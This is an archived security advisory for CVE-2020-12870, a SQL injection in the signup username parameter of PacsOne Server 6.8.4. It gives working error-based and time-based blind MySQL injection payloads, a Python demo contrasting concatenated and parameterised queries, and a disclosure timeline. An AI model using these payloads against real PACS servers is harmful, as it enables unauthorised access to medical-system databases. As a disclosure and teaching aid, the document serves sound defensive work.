This repository has been archived by the owner on Dec 18, 2022. It is now read-only.
Vulnerability

PacsOne Server 6.8.4 suffers from a SQL injection vulnerability in the username parameter of the signup page.

Exploit

Allows an attacker access to the usersignup table in the PACS server database.

Parameter: username (POST)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: hostname=localhost&database=PACS&username=asdf'||(SELECT 0x7a6d7355 WHERE 7540=7540 AND (SELECT 2789 FROM(SELECT COUNT(*),CONCAT(0x7178627171,(SELECT (ELT(2789=2789,1))),0x717a627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'&password=asdf&firstname=asdf&lastname=asfd&email=asfd@foo.bar&action=Sign Up

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: hostname=localhost&database=PACS&username=asdf'||(SELECT 0x7961476e WHERE 9154=9154 AND (SELECT 7374 FROM (SELECT(SLEEP(5)))nQhL))||'&password=asdf&firstname=asdf&lastname=asfd&email=asfd@foo.bar&action=Sign Up
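The root cause behind both payloads is the signup handler splicing the username into the INSERT text, so the `asdf'||(...)||'` shape closes the string literal, concatenates a subquery and reopens it. The following is an added illustration, not PacsOne's code: it models a minimal usersignup table in SQLite (where `||` is also string concatenation), shows the concatenated query beside the parameterised fix, and swaps the MySQL-specific error/timing expressions for a harmless subquery.

```python
import sqlite3

# Constructed stand-in for the PACS server's usersignup table (assumed columns).
SCHEMA = "CREATE TABLE usersignup (username TEXT, password TEXT, email TEXT)"


def fresh_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute(SCHEMA)
    return conn


def signup_vulnerable(conn, username, password, email):
    # Vulnerable pattern: request parameters are spliced into the SQL text.
    # A username of the form  asdf'||(SELECT ...)||'  closes the literal,
    # appends an attacker-chosen subquery, then reopens the literal.
    sql = ("INSERT INTO usersignup (username, password, email) VALUES ('"
           + username + "', '" + password + "', '" + email + "')")
    conn.execute(sql)
    conn.commit()


def signup_hardened(conn, username, password, email):
    # Hardened form: bound parameters, so the database treats every value
    # as data and never as part of the statement.
    conn.execute(
        "INSERT INTO usersignup (username, password, email) VALUES (?, ?, ?)",
        (username, password, email),
    )
    conn.commit()


def stored_username(conn) -> str:
    return conn.execute("SELECT username FROM usersignup").fetchone()[0]


# Constructed sample with the same shape as the page's payloads; the subquery
# is a harmless literal in place of the MySQL FLOOR/RAND or SLEEP expressions.
PAYLOAD = "asdf'||(SELECT 'subquery-ran')||'"


def demo():
    # Returns what each handler actually stored for the same input.
    v = fresh_db()
    signup_vulnerable(v, PAYLOAD, "asdf", "asfd@foo.bar")
    h = fresh_db()
    signup_hardened(h, PAYLOAD, "asdf", "asfd@foo.bar")
    return stored_username(v), stored_username(h)


if __name__ == "__main__":
    vulnerable, hardened = demo()
    print("concatenated query stored:", vulnerable)  # the subquery was evaluated
    print("parameterised query stored:", hardened)   # the literal payload text
```

In the vulnerable path the subquery runs and its result is concatenated into the stored username; in the hardened path the payload is stored verbatim, which is the behaviour the fixed release needs for every field the signup form submits.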



Timeline

05-07-20: Submitted incident through email, immediate response
05-21-20: Issue resolved
09-10-20: New version released
09-19-20: Submitted public disclosure

Reference

MITRE CVE-2020-12870

Disclaimer

Content is for educational and research purposes only. Author doesn’t hold any responsibility over the misuse of the software, exploits or security findings contained herein and does not condone them whatsoever.